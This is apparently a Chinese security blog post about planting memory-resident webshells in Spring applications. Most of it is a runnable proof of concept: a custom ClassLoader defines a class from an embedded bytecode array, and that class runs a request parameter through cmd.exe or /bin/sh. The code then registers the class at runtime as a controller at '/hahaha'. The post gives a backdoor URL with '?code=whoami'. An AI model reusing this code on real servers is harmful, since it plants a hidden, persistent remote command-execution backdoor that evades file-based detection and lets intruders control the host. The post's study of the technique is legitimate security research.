Java内存shell:三方框架

前文tomcat的通用servlet内存马已经基本可以覆盖大部分的情况,针对第三方框架,思路也是一样的,姿势不同。观星实验室的师傅们在参考【1】中提到了关于Sping的姿势,这里学习记录下。

Spring

具体的背景不赘述,详见参考【1】,几个重点的步骤

  1. 获得当前代码运行时的上下文环境
  2. 手动注册 controller
  3. controller 中的 Webshell 逻辑

文中师傅没有给出直接运行的poc,这里给一下

Show me the code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
class MyClassLoader extends ClassLoader{
    public MyClassLoader(ClassLoader parent) {
        super(parent);
    }
    public Class loadClass(String name) throws ClassNotFoundException {
        if(!"reflection.MyObject".equals(name))
            return super.loadClass(name);
        try {
//                        String url = "file:/Users/mody/study/java/MemShell/SpringDemo/target/test-classes/org/m0d9/sec/SpringDemo/SSOLogin.class";
//                        URL myUrl = new URL(url);
//                        URLConnection connection = myUrl.openConnection();
//                        InputStream input = connection.getInputStream();
//                        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
//                        int data = input.read();
//                        while(data != -1){
//                            buffer.write(data);
//                            data = input.read();
//                        }
//                        input.close();
//                        byte[] classData = buffer.toByteArray();
//                        System.out.println(Arrays.toString(classData));

            byte[] classData = new byte[]{-54, -2, -70, -66, 0, 0, 0, 49, 0, -125, 10, 0, 33, 0, 63, 8, 0, 64, 11, 0, 65, 0, 66, 11, 0, 67, 0, 68, 8, 0, 69, 8, 0, 70, 10, 0, 71, 0, 72, 10, 0, 12, 0, 73, 8, 0, 74, 10, 0, 12, 0, 75, 7, 0, 76, 7, 0, 77, 8, 0, 78, 8, 0, 79, 10, 0, 11, 0, 80, 8, 0, 81, 8, 0, 82, 7, 0, 83, 10, 0, 11, 0, 84, 10, 0, 85, 0, 86, 10, 0, 18, 0, 87, 8, 0, 88, 10, 0, 18, 0, 89, 10, 0, 18, 0, 90, 10, 0, 18, 0, 91, 10, 0, 18, 0, 92, 10, 0, 93, 0, 94, 10, 0, 93, 0, 95, 10, 0, 93, 0, 92, 11, 0, 67, 0, 96, 7, 0, 97, 7, 0, 98, 7, 0, 99, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 34, 76, 111, 114, 103, 47, 109, 48, 100, 57, 47, 115, 101, 99, 47, 83, 112, 114, 105, 110, 103, 68, 101, 109, 111, 47, 83, 83, 79, 76, 111, 103, 105, 110, 59, 1, 0, 5, 108, 111, 103, 105, 110, 1, 0, 82, 40, 76, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 113, 117, 101, 115, 116, 59, 76, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 115, 112, 111, 110, 115, 101, 59, 41, 86, 1, 0, 1, 112, 1, 0, 26, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 111, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 1, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 83, 99, 97, 110, 110, 101, 114, 59, 1, 0, 4, 97, 114, 103, 48, 1, 0, 6, 119, 114, 105, 116, 101, 114, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 87, 114, 105, 116, 101, 114, 59, 1, 0, 7, 114, 101, 113, 117, 101, 115, 116, 1, 0, 39, 76, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 113, 117, 101, 115, 116, 59, 1, 0, 8, 114, 101, 115, 112, 111, 110, 115, 101, 1, 0, 40, 76, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 115, 112, 111, 110, 115, 101, 59, 1, 0, 25, 82, 117, 110, 116, 105, 109, 101, 86, 105, 115, 105, 98, 108, 101, 65, 110, 110, 111, 116, 97, 116, 105, 111, 110, 115, 1, 0, 56, 76, 111, 114, 103, 47, 115, 112, 114, 105, 110, 103, 102, 114, 97, 109, 101, 119, 111, 114, 107, 47, 119, 101, 98, 47, 98, 105, 110, 100, 47, 97, 110, 110, 111, 116, 97, 116, 105, 111, 110, 47, 82, 101, 113, 117, 101, 115, 116, 77, 97, 112, 112, 105, 110, 103, 59, 1, 0, 5, 118, 97, 108, 117, 101, 1, 0, 8, 47, 102, 97, 118, 105, 99, 111, 110, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 13, 83, 83, 79, 76, 111, 103, 105, 110, 46, 106, 97, 118, 97, 1, 0, 43, 76, 111, 114, 103, 47, 115, 112, 114, 105, 110, 103, 102, 114, 97, 109, 101, 119, 111, 114, 107, 47, 115, 116, 101, 114, 101, 111, 116, 121, 112, 101, 47, 67, 111, 110, 116, 114, 111, 108, 108, 101, 114, 59, 12, 0, 34, 0, 35, 1, 0, 4, 99, 111, 100, 101, 7, 0, 100, 12, 0, 101, 0, 102, 7, 0, 103, 12, 0, 104, 0, 105, 1, 0, 0, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 106, 12, 0, 107, 0, 102, 12, 0, 108, 0, 109, 1, 0, 3, 119, 105, 110, 12, 0, 110, 0, 111, 1, 0, 24, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 34, 0, 112, 1, 0, 7, 47, 98, 105, 110, 47, 115, 104, 1, 0, 2, 45, 99, 1, 0, 17, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 83, 99, 97, 110, 110, 101, 114, 12, 0, 113, 0, 114, 7, 0, 115, 12, 0, 116, 0, 117, 12, 0, 34, 0, 118, 1, 0, 2, 92, 65, 12, 0, 119, 0, 120, 12, 0, 121, 0, 122, 12, 0, 123, 0, 109, 12, 0, 124, 0, 35, 7, 0, 125, 12, 0, 126, 0, 127, 12, 0, -128, 0, 35, 12, 0, -127, 0, -126, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 32, 111, 114, 103, 47, 109, 48, 100, 57, 47, 115, 101, 99, 47, 83, 112, 114, 105, 110, 103, 68, 101, 109, 111, 47, 83, 83, 79, 76, 111, 103, 105, 110, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 37, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 113, 117, 101, 115, 116, 1, 0, 12, 103, 101, 116, 80, 97, 114, 97, 109, 101, 116, 101, 114, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 38, 106, 97, 118, 97, 120, 47, 115, 101, 114, 118, 108, 101, 116, 47, 104, 116, 116, 112, 47, 72, 116, 116, 112, 83, 101, 114, 118, 108, 101, 116, 82, 101, 115, 112, 111, 110, 115, 101, 1, 0, 9, 103, 101, 116, 87, 114, 105, 116, 101, 114, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 87, 114, 105, 116, 101, 114, 59, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 8, 99, 111, 110, 116, 97, 105, 110, 115, 1, 0, 27, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 104, 97, 114, 83, 101, 113, 117, 101, 110, 99, 101, 59, 41, 90, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 5, 115, 116, 97, 114, 116, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 24, 40, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 41, 86, 1, 0, 12, 117, 115, 101, 68, 101, 108, 105, 109, 105, 116, 101, 114, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 83, 99, 97, 110, 110, 101, 114, 59, 1, 0, 7, 104, 97, 115, 78, 101, 120, 116, 1, 0, 3, 40, 41, 90, 1, 0, 4, 110, 101, 120, 116, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 87, 114, 105, 116, 101, 114, 1, 0, 5, 119, 114, 105, 116, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 5, 102, 108, 117, 115, 104, 1, 0, 9, 115, 101, 110, 100, 69, 114, 114, 111, 114, 1, 0, 4, 40, 73, 41, 86, 0, 33, 0, 32, 0, 33, 0, 0, 0, 0, 0, 2, 0, 1, 0, 34, 0, 35, 0, 1, 0, 36, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 37, 0, 0, 0, 6, 0, 1, 0, 0, 0, 18, 0, 38, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 39, 0, 40, 0, 0, 0, 1, 0, 41, 0, 42, 0, 2, 0, 36, 0, 0, 1, 121, 0, 6, 0, 8, 0, 0, 0, -77, 43, 18, 2, -71, 0, 3, 2, 0, 78, 44, -71, 0, 4, 1, 0, 58, 4, 45, -58, 0, -109, 18, 5, 58, 5, 18, 6, -72, 0, 7, -74, 0, 8, 18, 9, -74, 0, 10, -103, 0, 33, -69, 0, 11, 89, 6, -67, 0, 12, 89, 3, 18, 13, 83, 89, 4, 18, 14, 83, 89, 5, 45, 83, -73, 0, 15, 58, 6, -89, 0, 30, -69, 0, 11, 89, 6, -67, 0, 12, 89, 3, 18, 16, 83, 89, 4, 18, 17, 83, 89, 5, 45, 83, -73, 0, 15, 58, 6, -69, 0, 18, 89, 25, 6, -74, 0, 19, -74, 0, 20, -73, 0, 21, 18, 22, -74, 0, 23, 58, 7, 25, 7, -74, 0, 24, -103, 0, 11, 25, 7, -74, 0, 25, -89, 0, 5, 25, 5, 58, 5, 25, 7, -74, 0, 26, 25, 4, 25, 5, -74, 0, 27, 25, 4, -74, 0, 28, 25, 4, -74, 0, 29, -89, 0, 12, 44, 17, 1, -12, -71, 0, 30, 2, 0, -89, 0, 4, 78, -79, 0, 1, 0, 0, 0, -82, 0, -79, 0, 31, 0, 2, 0, 37, 0, 0, 0, 74, 0, 18, 0, 0, 0, 23, 0, 9, 0, 24, 0, 17, 0, 25, 0, 21, 0, 26, 0, 25, 0, 28, 0, 41, 0, 29, 0, 71, 0, 31, 0, 98, 0, 33, 0, 120, 0, 34, 0, -116, 0, 35, 0, -111, 0, 36, 0, -104, 0, 37, 0, -99, 0, 38, 0, -94, 0, 39, 0, -91, 0, 40, 0, -82, 0, 43, 0, -79, 0, 42, 0, -78, 0, 44, 0, 38, 0, 0, 0, 92, 0, 9, 0, 68, 0, 3, 0, 43, 0, 44, 0, 6, 0, 25, 0, -119, 0, 45, 0, 46, 0, 5, 0, 98, 0, 64, 0, 43, 0, 44, 0, 6, 0, 120, 0, 42, 0, 47, 0, 48, 0, 7, 0, 9, 0, -91, 0, 49, 0, 46, 0, 3, 0, 17, 0, -99, 0, 50, 0, 51, 0, 4, 0, 0, 0, -77, 0, 39, 0, 40, 0, 0, 0, 0, 0, -77, 0, 52, 0, 53, 0, 1, 0, 0, 0, -77, 0, 54, 0, 55, 0, 2, 0, 56, 0, 0, 0, 14, 0, 1, 0, 57, 0, 1, 0, 58, 91, 0, 1, 115, 0, 59, 0, 2, 0, 60, 0, 0, 0, 2, 0, 61, 0, 56, 0, 0, 0, 6, 0, 1, 0, 62, 0, 0};

            return defineClass("org.m0d9.sec.SpringDemo.SSOLogin",
                    classData, 0, classData.length);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }
}
ClassLoader parentClassLoader = MyClassLoader.class.getClassLoader();
MyClassLoader classLoader = new MyClassLoader(parentClassLoader);
Class myObjectClass = classLoader.loadClass("reflection.MyObject");


//            WebApplicationContext context = ContextLoader.getCurrentWebApplicationContext();
//        WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());
//        WebApplicationContext context = RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest());
WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);


// 1. 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);
// 2. 通过反射获得自定义 controller 中唯一的 Method 对象
//            Method method = (Class.forName("org.m0d9.sec.SpringDemo.SSOLogin").getDeclaredMethods())[0];
Method method = myObjectClass.getDeclaredMethods()[0];
// 3. 定义访问 controller 的 URL 地址
PatternsRequestCondition url = new PatternsRequestCondition("/hahaha");
// 4. 定义允许访问 controller 的 HTTP 方法(GET/POST)
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 5. 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
//            r.registerMapping(info, Class.forName("org.m0d9.sec.SpringDemo.SSOLogin").newInstance(), method);
r.registerMapping(info, myObjectClass.newInstance(), method);

执行之后可以看到registry已经添加成功

upload successful

http://localhost:8080/hahaha?code=whoami 为后门地址

小结

大同小异,其实都是找到上下文,执行恶意的code添加url映射及其对应代码。不过找到这些关键类,还是需要对框架的一定理解。

这两篇文章中,都没有提到在实际场景下,比如反序列化/fastjson等漏洞中,如何运行这些evil code,留待下篇总结解释。

参考

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true